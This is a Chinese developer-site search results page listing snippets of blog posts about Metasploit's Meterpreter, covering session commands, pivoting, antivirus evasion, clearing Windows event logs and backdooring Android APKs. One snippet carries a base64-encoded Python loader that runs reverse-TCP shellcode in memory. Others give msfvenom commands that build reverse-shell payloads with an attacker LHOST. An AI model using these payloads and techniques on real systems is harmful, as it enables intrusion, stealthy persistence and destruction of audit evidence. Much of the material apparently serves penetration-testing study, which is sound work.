首页
学习
活动
专区
圈层
工具
发布
    • 综合排序
    • 最热优先
    • 最新优先
    时间不限
  • 来自专栏TomatoCool

    meterpreter

    meterpreter作为漏洞溢出后的攻击载荷使用。 meterpreter基本命令: help 查看Meterpreter帮助 background 返回,把meterpreter后台挂起 bgkill 杀死一个 meterpreter 作为一个后台线程运行脚本 channel 显示活动频道 sessions 列出所有会话 sessions -h 查看session其他命令 close 关闭通道 exit 终止 meterpreter 会话 quit 终止 meterpreter 会话 interact id 切换进一个信道 irb 进入 Ruby 脚本模式 read 从通道读取数据 write 将数据写入到一个通道 use 加载 meterpreter 的扩展 load/use 加载模块 Resource 执行一个已有的rc脚本 安卓命令: dump_contacts 获取通讯录 dump_sms

    38440编辑于 2023-07-30
  • 来自专栏Mirror的技术成长

    Meterpreter初探

    Meterpreter Meterpreter号称“黑客瑞士军刀”,Meterpreter是Metasploit框架中的一个杀手锏,通常作为漏洞溢出后的攻击载荷使用,攻击载荷在触发漏洞后能够返回一个我们控制通道 ,例如利用远程过程带哦用RPC服务的一个漏洞,当漏洞被触发后,我们选择Meterpreter作为攻击载荷,就能够获得目标系统上的一个Meterpreter Shell连接。 认识 Meterpreter 获得Meterpreter会话 攻陷目标操作系统系统后就可以进入Meterpreter会话 ? 根据《首次系统渗透Win_xp》的内容成功进入xp系统,随即出现meterpreter命令交互界面 获得目标系统的Meterpreter会话后,可以利用基本的Meterpreter命令完成更多的骚操作 ps:meterpreter控制台中,输入background可以跳转到MSF终端里,Meterpreter会话仍在运行,然后输入sessions -i [会话ID]返回Meterpreter控制台。

    1.2K30发布于 2020-11-13
  • 来自专栏漫流砂

    meterpreter shell | 加固shell

    https://null-byte.wonderhowto.com/how-to/elevate-netcat-shell-meterpreter-session-for-more-power-control -0193211/ metasploit 中的 meterpreter shell 是一个我们比较喜欢的shell,因为方便我们后续加载各种模块,简直不要太方便 所以我们这次把一个简单的shell升级为 我们使用 sessions -u 1 将普通shell提升为 meterpreter shell(创建一个新的shell) ? 可以看到有一个新的meterpreter shell 产生了,仔细看回显其实可以看出实际上是调用了 post/multi/manage/shell_to_meterpreter 我们进入这个shell来测试一下吧 可以看到成功获取到meterpreter 的shell,这个shell 功能太全了,之前说的命令补全、Ctrl+c 不退出 但是默认不支持 su,ssh等 当然可以使用msf的库来实现了

    2K20发布于 2020-08-20
  • 来自专栏洛米唯熊

    Meterpreter实现网络穿透

    场景:攻击者拿下目标服务器发现目标服务器处于内网环境,内网中有其他服务器 目的:使用已经拿下的服务器作为网络跳板对处于目标内网的其他服务器进行攻击

    73220发布于 2019-07-25
  • 来自专栏cjz的专栏

    meterpreter 监控桌面命令(screenshare)

    meterpreter 监控桌面命令如下 在练习使用 msf 渗透框架玩耍时,无论是正向还是返向 shell 控制端一般都是这个 meterpreter > ,那么如何动态监控靶机现在正在看什么那?

    1K50编辑于 2022-12-21
  • 【详解】MSF—Meterpreter清理日志

    MSF—Meterpreter清理日志在渗透测试过程中,使用Metasploit框架(MSF)及其后渗透模块Meterpreter进行操作时,为了确保测试的隐蔽性和避免留下痕迹,清理日志是一个非常重要的步骤 Meterpreter简介Meterpreter是Metasploit框架中的一个高级后渗透工具,它提供了一个动态且灵活的交互式shell环境,允许攻击者执行各种复杂的后渗透任务,如文件操作、系统信息收集 使用Meterpreter清理日志3.1 加载标准扩展首先,确保你的Meterpreter会话已经加载了标准的扩展模块。 使用方法如下:meterpreter > clearev执行该命令后,Meterpreter会自动清除所有已知的Windows事件日志,包括应用程序日志、安全日志和系统日志。 以下是一个示例脚本,展示了如何使用Meterpreter清理Windows系统的事件日志。这个例子假设你已经成功地通过Metasploit获得了目标系统的Meterpreter会话。

    30300编辑于 2025-08-25
  • 来自专栏FreeBuf

    Meterpreter免杀及对抗分析

    0x00 前言 本文就常见的一些杀毒软件检测方法及meterpreter远控对抗杀毒软件的思路进行了一些介绍,相关内容可以参考我的上一篇文章meterpreter技巧分享。 shellcode编译的具体方式请参考我之前的文章meterpreter技巧分享,这里不再赘述。 0x02 流量检测与对抗 1.Meterpreter的传输加载 要知道meterpreter的流量特征,首先要搞清楚meterpreter的传输方式。 为了让客户端运行服务端发送的meterpreter payload,需要先发送一个加载meterpreter_loader,这个引导代码的源码如下(完整源码地址): ? 2.Meterpreter检测 这段meterpreter_loader是固定的一段汇编代码,通过nasm将该部分汇编代码转化为机器码如下(可能随环境变化): ?

    2.8K90发布于 2018-02-26
  • 来自专栏Ms08067安全实验室

    红队作业 | 免杀Meterpreter java马

    文章来源|MS08067 红队培训班 第5期 本文作者:aeqaq(红队培训班5期学员) 按老师要求尝试完成布置的作业如下: 目标: 分析msf meterpreter java马的原理,然后自己写一个保留了核心逻辑的 1.生成马 msf6 > use java/meterpreter/reverse_tcp msf6 payload(java/meterpreter/reverse_tcp) > msfvenom - p java/meterpreter/reverse_tcp LHOST=1.117.xxxxxx LPORT=4444 W >text.jar 2.反编译分析源码 2.1用jd-gui反编译源码导出

    1.2K20编辑于 2022-02-10
  • 来自专栏漫流砂

    不落地反弹meterpreter | Linux后门系列

    之前一直看大家在做分离免杀,但大部分都是windows上的,既然学习Linux,就搞一个Linux版本的一句话反弹meterpreter,借用分离免杀的思想:用 Python3 执行 shellcode payload : linux/x64/meterpreter/reverse_tcp 生成shellcode use payload/linux/x64/meterpreter/reverse_tcp aW1wb3J0IGN0eXBlcywgbW1hcAoKZGVmIGNyZWF0ZV9zaGVsbGNvZGVfZnVuY3Rpb24gKHNoZWxsY29kZV9ieXRlcyk6CgogICAgIyBBbGxvY2F0ZSBtZW1vcnkgd2l0aCBhIFJXWCBwcml2YXRlIGFub255bW91cyBtbWFwCiAgICBleGVjX21lbSA9IG1tYXAubW1hcCgtMSwgbGVuKHNoZWxsY29kZV9ieXRlcyksCiAgICAgICAgICAgICAgICAgICAgICAgICBwcm90ID0gbW1hcC5QUk9UX1JFQUQgfCBtbWFwLlBST1RfV1JJVEUgfCBtbWFwLlBST1RfRVhFQywKICAgICAgICAgICAgICAgICAgICAgICAgIGZsYWdzID0gbW1hcC5NQVBfQU5PTllNT1VTIHwgbW1hcC5NQVBfUFJJVkFURSkKCiAgICAjIENvcHkgc2hlbGxjb2RlIGZyb20gYnl0ZXMgb2JqZWN0IHRvIGV4ZWN1dGFibGUgbWVtb3J5CiAgICBleGVjX21lbS53cml0ZShzaGVsbGNvZGVfYnl0ZXMpCgogICAgIyBDYXN0IHRoZSBtZW1vcnkgdG8gYSBDIGZ1bmN0aW9uIG9iamVjdAogICAgY3R5cGVzX2J1ZmZlciA9IGN0eXBlcy5jX2ludC5mcm9tX2J1ZmZlcihleGVjX21lbSkKICAgIGZ1bmN0aW9uID0gY3R5cGVzLkNGVU5DVFlQRSggY3R5cGVzLmNfaW50NjQgKShjdHlwZXMuYWRkcmVzc29mKGN0eXBlc19idWZmZXIpKQogICAgZnVuY3Rpb24uX2F2b2lkX2djX2Zvcl9tbWFwID0gZXhlY19tZW0KCiAgICAjIFJldHVybiBwb2ludGVyIHRvIHNoZWxsIGNvZGUgZnVuY3Rpb24gaW4gZXhlY3V0YWJsZSBtZW1vcnkKICAgIHJldHVybiBmdW5jdGlvbgoKYnVmID0gYiJceDQ4XHgzMVx4ZmZceDZhXHgwOVx4NThceDk5XHhiNlx4MTBceDQ4XHg4OVx4ZDZceDRkXHgzMVx4YzlceDZhXHgyMlx4NDFceDVhXHhiMlx4MDdceDBmXHgwNVx4NDhceDg1XHhjMFx4NzhceDUxXHg2YVx4MGFceDQxXHg1OVx4NTBceDZhXHgyOVx4NThceDk5XHg2YVx4MDJceDVmXHg2YVx4MDFceDVlXHgwZlx4MDVceDQ4XHg4NVx4YzBceDc4XHgzYlx4NDhceDk3XHg0OFx4YjlceDAyXHgwMFx4MTVceGIzXHhjMFx4YThceDAxXHgyNlx4NTFceDQ4XHg4OVx4ZTZceDZhXHgxMFx4NWFceDZhXHgyYVx4NThceDBmXHgwNVx4NTlceDQ4XHg4NVx4YzBceDc5XHgyNVx4NDlceGZmXHhjOVx4NzRceDE4XHg1N1x4NmFceDIzXHg1OFx4NmFceDAwXHg2YVx4MDVceDQ4XHg4OVx4ZTdceDQ4XHgzMVx4ZjZceDBmXHgwNVx4NTlceDU5XHg1Zlx4NDhceDg1XHhjMFx4NzlceGM3XHg2YVx4M2NceDU4XHg2YVx4MDFceDVmXHgwZlx4MDVceDVlXHg2YVx4N2VceDVhXHgwZlx4MDVceDQ4XHg4NVx4YzBceDc4XHhlZFx4ZmZceGU2IgoKIyBsaW51eCBtYWNoaW5lIGNvZGUKc2hlbGxjb2RlID0gYnVmCgojIENyZWF0ZSBhIHBvaW50ZXIgdG8gb3VyIHNoZWxsIGNvZGUgYW5kIGV4ZWN1dGUgaXQgd2l0aCBubyBwYXJhbWV0ZXJzCmNyZWF0ZV9zaGVsbGNvZGVfZnVuY3Rpb24oc2hlbGxjb2RlKSgp'))) 监听+执行 攻击机监听 use exploit/multi/handler set payload linux/x64/meterpreter 成功获取到 meterpreter shell ! 反弹shell章节就此结束。

    1.8K30发布于 2020-08-20
  • 来自专栏FreeBuf

    图解Meterpreter实现网络穿透的方法

    在Metasploit中可以轻松完成这项任务,在当前meterpreter会话下键入以下命令可创建路由规则: ? 根据定义的路由规则,只要Meterpreter就会ID值为2的会话在运行,那么在Metasploit的框架中就可以访问7.7.7.0/24网络。 基于这个原因,我们可以通过定义meterpreter会话在我们的本地开启一个端口,将本地数据包发送到目的地。只要进程存活,路由就会一直工作。 在第二个隐藏网络下执行Arp扫描继续收集信息 meterpreter > run post/windows/gather/arp_scanner RHOSTS=8.8.8.0/24[*] Running COMPUTER SYSTEMS)[*] IP: 8.8.8.13 MAC 08:00:27:13:a3:b1 (CADMUS COMPUTER SYSTEMS) ARP扫描结果显示在该网络下存在4台机器 meterpreter

    1.3K60发布于 2018-02-09
  • 来自专栏HACK学习

    图解Meterpreter实现网络穿透的方法

    在Metasploit中可以轻松完成这项任务,在当前meterpreter会话下键入以下命令可创建路由规则: ? 根据定义的路由规则,只要Meterpreter就会ID值为2的会话在运行,那么在Metasploit的框架中就可以访问7.7.7.0/24网络。 基于这个原因,我们可以通过定义meterpreter会话在我们的本地开启一个端口,将本地数据包发送到目的地。只要进程存活,路由就会一直工作。 在第二个隐藏网络下执行Arp扫描继续收集信息 meterpreter > run post/windows/gather/arp_scanner RHOSTS=8.8.8.0/24[*] Running COMPUTER SYSTEMS)[*] IP: 8.8.8.13 MAC 08:00:27:13:a3:b1 (CADMUS COMPUTER SYSTEMS) ARP扫描结果显示在该网络下存在4台机器 meterpreter

    1.6K30发布于 2019-08-06
  • 来自专栏网络安全技术点滴分享

    在Android APK中嵌入Meterpreter的技术解析

    在Android APK中嵌入Meterpreter作者:Joff Thyer 分类:移动安全/红队技术随着移动应用的普及,Android平台因其开放性成为安全研究的重点目标。 本文将演示如何通过技术手段将Meterpreter后门植入合法APK文件。技术背景Android应用采用Java编写,最终编译为DEX字节码格式。 准备阶段从第三方站点(如apkmonk.com)获取目标APK使用msfvenom生成Meterpreter载荷:msfvenom -p android/meterpreter/reverse_tcp

    37010编辑于 2025-08-16
  • 来自专栏FreeBuf

    Meterpreter免杀技巧分享(亲测有效)

    需要说明的是meterpreter在漏洞利用成功后会发送第二阶段的代码和meterpreter服务器dll,所以在网络不稳定的情况下经常出现没有可执行命令,或者会话建立执行help之后发现缺少命令,经常出现什么 Green_m.exe 这样可以生成一个使用tcp协议反向连接到192.168.1.200的4444端口的meterpreter的后门。 0×03 生成shellcode免杀 长话短说,手动编译meterpreter并对shellcode进行编码就能绕过静态查杀,meterpreter本身就是直接加载进内存并且有编码,绕过动态查杀基本没问题 在对市面上主流的杀软进行测试的过程中,发现symantec会在meterpreter回连成功,从metasploit里接受数据的时候报毒。 0×05 meterpreter常驻的免杀 常见的添加meterpreter 常驻的方法无非两种:persistence和metsvc。

    3K120发布于 2018-02-09
  • 来自专栏FreeBuf

    Kage:针对Metasploit Meterpreter图形化用户接口

     关于Kage Kage是一款针对Metasploit RPC服务器的图形化用户交互工具,该工具可以帮助广大研究人员通过图形化的用户UI界面与Meterpreter会话进行交互,并生成Payload。 需要注意的是,当前版本的Kage仅支持windows/meterpreter和android/meterpreter。  

    67220编辑于 2023-03-30
  • 来自专栏漏洞知识库

    通过Windows自带FTP一条命令反弹Meterpreter

    FTF反弹Meterpreter FTP 首先在黑客机器上开启一个 ftp 服务(Slyar FTPserver):root、root ?

    1.5K50发布于 2021-01-27
  • 来自专栏HACK学习

    手把手教你如何利用Meterpreter渗透Windows系统

    而windows/x64/meterpreter/reverse_tcp则由一个Stager Payload(reverse_tcp)和一个Stage Payload(meterpreter)组成。 Meterpreter是什么? 在Metasploit Framework中,Meterpreter是一种后渗透工具,它属于一种在运行过程中可通过网络进行功能扩展的动态可扩展型Payload。 其中,攻击者与目标设备中Meterpreter的通信是通过Stager套接字实现的。 部署Meterpreter 在这里,我们选择使用reverse_tcp(windows/x64/meterpreter/reverse_tcp)来作为Stager,配置和运行情况如下图所示: ? 绑定进程 Meterpreter既可以单独运行,也可以与其他进程进行绑定。因此,我们可以让Meterpreter与类似explorer.exe这样的进程进行绑定,并以此来实现持久化。

    2.9K41发布于 2019-08-07
  • 来自专栏FreeBuf

    看我如何获取Chef服务器的Meterpreter Shell

    成功获取到了一个meterpreter shell。 为了操作的安全性,一旦你成功获取到了shell连接,请返回到web界面,并从已成功连接的节点运行列表中删除recipe。 kill你的Meterpreter会话,删除你创建的管理用户以及recipe。你可以通过以下命令完成。 关闭会话: ? 主机与knife的连接: ?

    1.5K20发布于 2018-07-30
  • 来自专栏cjz的专栏

    meterpreter 使用 shell乱码问题解决方法

    问题 我们使用msf框架反弹shell或者主动攻击成功是,控制终端meterpreter 使用 shell乱码问题解决方法,一般都是Windows系统的cmd乱码问题 问题如图: 解决方法:

    81220编辑于 2022-12-21
  • 渗透测试常用工具-使用meterpreter模块进行后渗透测试

    使用meterpreter模块进行后渗透测试 第一步,打开网络拓扑,点击启动选项,启动实验虚拟机 第二步,使用ifconfig和ipconfig命令分别获取渗透机和靶机的IP地址,使用ping命令进行网络连通性测试 ,确保网络可达 渗透机ip地址172.16.1.40 靶机ip地址172.16.1.20 第三步,常见的后渗透模块的类型有: reverse_tcp (路径:payload/windows/meterpreter /reverse_tcp) 由于绕过 UAC 的功能需在 meterpreter 的shell 才能实现。 因此,我们首先要做的就是取得目标机器的 meterpreter shell 。 /https) 通过http/https的方式反向连接,在网速比较慢情况下不稳定 第六步,使用命令help查看meterpreter的帮助参数 常用参数有: Background:将当前会话置于后台运行

    37310编辑于 2025-10-23
  • Kali环境meterpreter 使用 shell乱码问题解决方法

    我们使用msf框架反弹shell或者主动攻击成功是,控制终端meterpreter 使用 shell乱码问题解决方法,一般都是Windows系统的cmd乱码问题 问题如下图 解决方法: 在shell终端中输入

    25410编辑于 2025-10-23
领券